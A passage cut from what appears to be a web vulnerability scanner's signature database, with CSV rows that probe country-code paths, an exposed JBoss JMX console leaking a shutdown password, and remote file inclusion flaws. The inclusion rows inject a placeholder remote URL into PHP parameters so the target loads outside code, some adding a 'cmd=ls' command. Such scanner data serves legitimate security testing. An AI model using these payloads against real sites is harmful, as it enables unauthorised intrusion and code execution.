Kong)\",\"\",\"\"\n\"003698\",\"3092\",\"1\",\"/hu/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Hungary)\",\"\",\"\"\n\"003699\",\"3092\",\"1\",\"/is/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Iceland)\",\"\",\"\"\n\"003700\",\"3092\",\"1\",\"/in/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (India)\",\"\",\"\"\n\"003701\",\"3092\",\"1\",\"/id/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Indonesia)\",\"\",\"\"\n\"003702\",\"3092\",\"1\",\"/ir/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Islamic Republic Of Iran)\",\"\",\"\"\n\"003703\",\"3092\",\"1\",\"/iq/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Iraq)\",\"\",\"\"\n\"003704\",\"3092\",\"1\",\"/ie/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Ireland)\",\"\",\"\"\n\"003705\",\"3092\",\"1\",\"/im/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Isle Of Man)\",\"\",\"\"\n\"003706\",\"3092\",\"1\",\"/il/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Israel)\",\"\",\"\"\n\"003707\",\"3092\",\"1\",\"/it/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Italy)\",\"\",\"\"\n\"003708\",\"3092\",\"1\",\"/jm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Jamaica)\",\"\",\"\"\n\"003709\",\"3092\",\"1\",\"/jp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Japan)\",\"\",\"\"\n\"003710\",\"3092\",\"1\",\"/je/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Jersey)\",\"\",\"\"\n\"003711\",\"3092\",\"1\",\"/jo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Jordan)\",\"\",\"\"\n\"003712\",\"3092\",\"1\",\"/kz/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Kazakhstan)\",\"\",\"\"\n\"003713\",\"3092\",\"1\",\"/ke/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Kenya)\",\"\",\"\"\n\"003714\",\"3092\",\"1\",\"/ki/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Kiribati)\",\"\",\"\"\n\"003715\",\"3092\",\"1\",\"/kp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Democratic People's Republic Of Korea)\",\"\",\"\"\n\"003716\",\"3092\",\"1\",\"/kr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Republic Of Korea)\",\"\",\"\"\n\"003717\",\"3092\",\"1\",\"/kw/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Kuwait)\",\"\",\"\"\n\"003718\",\"3092\",\"1\",\"/kg/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Kyrgyzstan)\",\"\",\"\"\n\"003719\",\"3092\",\"1\",\"/la/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Lao People's Democratic Republic)\",\"\",\"\"\n\"003720\",\"3092\",\"1\",\"/lv/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Latvia)\",\"\",\"\"\n\"003721\",\"3092\",\"1\",\"/lb/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Lebanon)\",\"\",\"\"\n\"003722\",\"3092\",\"1\",\"/ls/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Lesotho)\",\"\",\"\"\n\"003723\",\"3092\",\"1\",\"/lr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Liberia)\",\"\",\"\"\n\"003724\",\"3092\",\"1\",\"/ly/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Libyan Arab Jamahiriya)\",\"\",\"\"\n\"003725\",\"3092\",\"1\",\"/li/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Liechtenstein)\",\"\",\"\"\n\"003726\",\"3092\",\"1\",\"/lt/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Lithuania)\",\"\",\"\"\n\"003727\",\"3092\",\"1\",\"/lu/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Luxembourg)\",\"\",\"\"\n\"003728\",\"3092\",\"1\",\"/mo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Macao)\",\"\",\"\"\n\"003729\",\"3092\",\"1\",\"/mk/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Macedonia)\",\"\",\"\"\n\"003730\",\"3092\",\"1\",\"/mg/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Madagascar)\",\"\",\"\"\n\"003731\",\"3092\",\"1\",\"/mw/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Malawi)\",\"\",\"\"\n\"003732\",\"3092\",\"1\",\"/my/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Malaysia)\",\"\",\"\"\n\"003733\",\"3092\",\"1\",\"/mv/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Maldives)\",\"\",\"\"\n\"003734\",\"3092\",\"1\",\"/ml/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Mali)\",\"\",\"\"\n\"003735\",\"3092\",\"1\",\"/mt/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Malta)\",\"\",\"\"\n\"003736\",\"3092\",\"1\",\"/mh/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Marshall Islands)\",\"\",\"\"\n\"003737\",\"3092\",\"1\",\"/mq/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Martinique)\",\"\",\"\"\n\"003738\",\"3092\",\"1\",\"/mr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Mauritania)\",\"\",\"\"\n\"003739\",\"3092\",\"1\",\"/mu/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Mauritius)\",\"\",\"\"\n\"003740\",\"3092\",\"1\",\"/yt/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Mayotte)\",\"\",\"\"\n\"003741\",\"3092\",\"1\",\"/mx/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Mexico)\",\"\",\"\"\n\"003742\",\"3092\",\"1\",\"/fm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Federated States Of Micronesia)\",\"\",\"\"\n\"003743\",\"3092\",\"1\",\"/md/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Republic Of Moldova)\",\"\",\"\"\n\"003744\",\"3092\",\"1\",\"/mc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Monaco)\",\"\",\"\"\n\"003745\",\"3092\",\"1\",\"/mn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Mongolia)\",\"\",\"\"\n\"003746\",\"3092\",\"1\",\"/me/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Montenegro)\",\"\",\"\"\n\"003747\",\"3092\",\"1\",\"/ms/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Montserrat)\",\"\",\"\"\n\"003748\",\"3092\",\"1\",\"/ma/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Morocco)\",\"\",\"\"\n\"003749\",\"3092\",\"1\",\"/mz/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Mozambique)\",\"\",\"\"\n\"003750\",\"3092\",\"1\",\"/mm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Myanmar)\",\"\",\"\"\n\"003751\",\"3092\",\"1\",\"/na/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Namibia)\",\"\",\"\"\n\"003752\",\"3092\",\"1\",\"/nr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Nauru)\",\"\",\"\"\n\"003753\",\"3092\",\"1\",\"/np/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Nepal)\",\"\",\"\"\n\"003754\",\"3092\",\"1\",\"/nl/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Netherlands)\",\"\",\"\"\n\"003755\",\"3092\",\"1\",\"/an/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Netherlands Antilles)\",\"\",\"\"\n\"003756\",\"3092\",\"1\",\"/nc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (New Caledonia)\",\"\",\"\"\n\"003757\",\"3092\",\"1\",\"/nz/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (New Zealand)\",\"\",\"\"\n\"003758\",\"3092\",\"1\",\"/ni/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Nicaragua)\",\"\",\"\"\n\"003759\",\"3092\",\"1\",\"/ne/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Niger)\",\"\",\"\"\n\"003760\",\"3092\",\"1\",\"/ng/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Nigeria)\",\"\",\"\"\n\"003761\",\"3092\",\"1\",\"/nu/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Niue)\",\"\",\"\"\n\"003762\",\"3092\",\"1\",\"/nf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Norfolk Island)\",\"\",\"\"\n\"003763\",\"3092\",\"1\",\"/mp/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Northern Mariana Islands)\",\"\",\"\"\n\"003764\",\"3092\",\"1\",\"/no/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Norway)\",\"\",\"\"\n\"003765\",\"3092\",\"1\",\"/om/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Oman)\",\"\",\"\"\n\"003766\",\"3092\",\"1\",\"/pk/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Pakistan)\",\"\",\"\"\n\"003767\",\"3092\",\"1\",\"/pw/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Palau)\",\"\",\"\"\n\"003768\",\"3092\",\"1\",\"/ps/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Palestinian Territory)\",\"\",\"\"\n\"003769\",\"3092\",\"1\",\"/pa/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Panama)\",\"\",\"\"\n\"003770\",\"3092\",\"1\",\"/pg/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Papua New Guinea)\",\"\",\"\"\n\"003771\",\"3092\",\"1\",\"/py/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Paraguay)\",\"\",\"\"\n\"003772\",\"3092\",\"1\",\"/pe/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Peru)\",\"\",\"\"\n\"003773\",\"3092\",\"1\",\"/ph/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Philippines)\",\"\",\"\"\n\"003774\",\"3092\",\"1\",\"/pn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Pitcairn)\",\"\",\"\"\n\"003775\",\"3092\",\"1\",\"/pl/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Poland)\",\"\",\"\"\n\"003776\",\"3092\",\"1\",\"/pt/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Portugal)\",\"\",\"\"\n\"003777\",\"3092\",\"1\",\"/pr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Puerto Rico)\",\"\",\"\"\n\"003778\",\"3092\",\"1\",\"/qa/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Qatar)\",\"\",\"\"\n\"003779\",\"3092\",\"1\",\"/re/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (RÉunion)\",\"\",\"\"\n\"003780\",\"3092\",\"1\",\"/ro/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Romania)\",\"\",\"\"\n\"003781\",\"3092\",\"1\",\"/ru/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Russian Federation)\",\"\",\"\"\n\"003782\",\"3092\",\"1\",\"/rw/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Rwanda)\",\"\",\"\"\n\"003783\",\"3092\",\"1\",\"/bl/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Saint BarthÉlemy)\",\"\",\"\"\n\"003784\",\"3092\",\"1\",\"/sh/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Saint Helena)\",\"\",\"\"\n\"003785\",\"3092\",\"1\",\"/kn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Saint Kitts And Nevis)\",\"\",\"\"\n\"003786\",\"3092\",\"1\",\"/lc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Saint Lucia)\",\"\",\"\"\n\"003787\",\"3092\",\"1\",\"/mf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Saint Martin)\",\"\",\"\"\n\"003788\",\"3092\",\"1\",\"/pm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Saint Pierre And Miquelon)\",\"\",\"\"\n\"003789\",\"3092\",\"1\",\"/vc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Saint Vincent And The Grenadines)\",\"\",\"\"\n\"003790\",\"3092\",\"1\",\"/ws/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Samoa)\",\"\",\"\"\n\"003791\",\"3092\",\"1\",\"/sm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (San Marino)\",\"\",\"\"\n\"003792\",\"3092\",\"1\",\"/st/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Sao Tome And Principe)\",\"\",\"\"\n\"003793\",\"3092\",\"1\",\"/sa/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Saudi Arabia)\",\"\",\"\"\n\"003794\",\"3092\",\"1\",\"/sn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Senegal)\",\"\",\"\"\n\"003795\",\"3092\",\"1\",\"/rs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Serbia)\",\"\",\"\"\n\"003796\",\"3092\",\"1\",\"/sc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Seychelles)\",\"\",\"\"\n\"003797\",\"3092\",\"1\",\"/sl/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Sierra Leone)\",\"\",\"\"\n\"003798\",\"3092\",\"1\",\"/sg/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Singapore)\",\"\",\"\"\n\"003799\",\"3092\",\"1\",\"/sk/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Slovakia)\",\"\",\"\"\n\"003800\",\"3092\",\"1\",\"/si/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Slovenia)\",\"\",\"\"\n\"003801\",\"3092\",\"1\",\"/sb/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Solomon Islands)\",\"\",\"\"\n\"003802\",\"3092\",\"1\",\"/so/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Somalia)\",\"\",\"\"\n\"003803\",\"3092\",\"1\",\"/za/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (South Africa)\",\"\",\"\"\n\"003804\",\"3092\",\"1\",\"/gs/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (South Georgia And The South Sandwich Islands)\",\"\",\"\"\n\"003805\",\"3092\",\"1\",\"/es/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Spain)\",\"\",\"\"\n\"003806\",\"3092\",\"1\",\"/lk/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Sri Lanka)\",\"\",\"\"\n\"003807\",\"3092\",\"1\",\"/sd/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Sudan)\",\"\",\"\"\n\"003808\",\"3092\",\"1\",\"/sr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Suriname)\",\"\",\"\"\n\"003809\",\"3092\",\"1\",\"/sj/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Svalbard And Jan Mayen)\",\"\",\"\"\n\"003810\",\"3092\",\"1\",\"/sz/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Swaziland)\",\"\",\"\"\n\"003811\",\"3092\",\"1\",\"/se/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Sweden)\",\"\",\"\"\n\"003812\",\"3092\",\"1\",\"/ch/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Switzerland)\",\"\",\"\"\n\"003813\",\"3092\",\"1\",\"/sy/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Syrian Arab Republic)\",\"\",\"\"\n\"003814\",\"3092\",\"1\",\"/tw/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Taiwan)\",\"\",\"\"\n\"003815\",\"3092\",\"1\",\"/tj/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Tajikistan)\",\"\",\"\"\n\"003816\",\"3092\",\"1\",\"/tz/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (United Republic Of Tanzania)\",\"\",\"\"\n\"003817\",\"3092\",\"1\",\"/th/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Thailand)\",\"\",\"\"\n\"003818\",\"3092\",\"1\",\"/tl/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Timor-leste)\",\"\",\"\"\n\"003819\",\"3092\",\"1\",\"/tg/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Togo)\",\"\",\"\"\n\"003820\",\"3092\",\"1\",\"/tk/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Tokelau)\",\"\",\"\"\n\"003821\",\"3092\",\"1\",\"/to/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Tonga)\",\"\",\"\"\n\"003822\",\"3092\",\"1\",\"/tt/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Trinidad And Tobago)\",\"\",\"\"\n\"003823\",\"3092\",\"1\",\"/tn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Tunisia)\",\"\",\"\"\n\"003824\",\"3092\",\"1\",\"/tr/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Turkey)\",\"\",\"\"\n\"003825\",\"3092\",\"1\",\"/tm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Turkmenistan)\",\"\",\"\"\n\"003826\",\"3092\",\"1\",\"/tc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Turks And Caicos Islands)\",\"\",\"\"\n\"003827\",\"3092\",\"1\",\"/tv/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Tuvalu)\",\"\",\"\"\n\"003828\",\"3092\",\"1\",\"/ug/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Uganda)\",\"\",\"\"\n\"003829\",\"3092\",\"1\",\"/ua/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Ukraine)\",\"\",\"\"\n\"003830\",\"3092\",\"1\",\"/ae/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (United Arab Emirates)\",\"\",\"\"\n\"003831\",\"3092\",\"1\",\"/gb/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (United Kingdom)\",\"\",\"\"\n\"003832\",\"3092\",\"1\",\"/us/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (United States)\",\"\",\"\"\n\"003833\",\"3092\",\"1\",\"/um/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (United States Minor Outlying Islands)\",\"\",\"\"\n\"003834\",\"3092\",\"1\",\"/uy/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Uruguay)\",\"\",\"\"\n\"003835\",\"3092\",\"1\",\"/uz/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Uzbekistan)\",\"\",\"\"\n\"003836\",\"3092\",\"1\",\"/vu/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Vanuatu)\",\"\",\"\"\n\"003837\",\"3092\",\"1\",\"/ve/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Venezuela)\",\"\",\"\"\n\"003838\",\"3092\",\"1\",\"/vn/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Viet Nam)\",\"\",\"\"\n\"003839\",\"3092\",\"1\",\"/vg/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (British Virgin Islands)\",\"\",\"\"\n\"003840\",\"3092\",\"1\",\"/vi/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (U.S. Virgin Islands)\",\"\",\"\"\n\"003841\",\"3092\",\"1\",\"/wf/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Wallis And Futuna)\",\"\",\"\"\n\"003842\",\"3092\",\"1\",\"/eh/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Western Sahara)\",\"\",\"\"\n\"003843\",\"3092\",\"1\",\"/ye/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Yemen)\",\"\",\"\"\n\"003844\",\"3092\",\"1\",\"/zm/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Zambia)\",\"\",\"\"\n\"003845\",\"3092\",\"1\",\"/zw/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting: potential country code (Zimbabwe)\",\"\",\"\"\n\"003846\",\"61059\",\"3be\",\"/jmx-console/\",\"GET\",\"ObjectName\",\"\",\"\",\"\",\"\",\"JBoss JMX Agent View found. See http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf\",\"\",\"\"\n\"006822\",\"61059\",\"3b\",\"/jmx-console/HtmlAdaptor?action=inspectMBean&name=Catalina%3Atype%3DServer\",\"GET\",\"Shutdown password\",\"\",\"\",\"\",\"\",\"JBoss JMX Agent reveals the shutdown password and port information\",\"\",\"\"\n\"003848\",\"3092\",\"1\",\"/www/2\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting.\",\"\",\"\"\n\"003849\",\"5292\",\"c\",\"/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003850\",\"5292\",\"c\",\"/123flashchat.php?e107path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003851\",\"5292\",\"c\",\"/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003852\",\"5292\",\"c\",\"/22_ultimate/templates/header.php?mainpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003853\",\"5292\",\"c\",\"/22_ultimate/templates/header.php?mainpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003854\",\"5292\",\"c\",\"/?_CONFIG[files][functions_page]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003855\",\"5292\",\"c\",\"/?npage=-1&content_dir=@RFIURL%00&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003856\",\"5292\",\"c\",\"/?npage=1&content_dir=@RFIURL%00&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003857\",\"5292\",\"c\",\"/?show=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003858\",\"5292\",\"c\",\"/A-Blog/navigation/donation.php?navigation_start=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003859\",\"5292\",\"c\",\"/A-Blog/navigation/latestnews.php?navigation_start=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003860\",\"5292\",\"c\",\"/A-Blog/navigation/links.php?navigation_start=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003861\",\"5292\",\"c\",\"/A-Blog/navigation/search.php?navigation_end=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003862\",\"5292\",\"c\",\"/A-Blog/sources/myaccount.php?open_box=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003863\",\"5292\",\"c\",\"/ACGVnews/header.php?PathNews=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003864\",\"5292\",\"c\",\"/ATutor/documentation/common/frame_toc.php?section=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 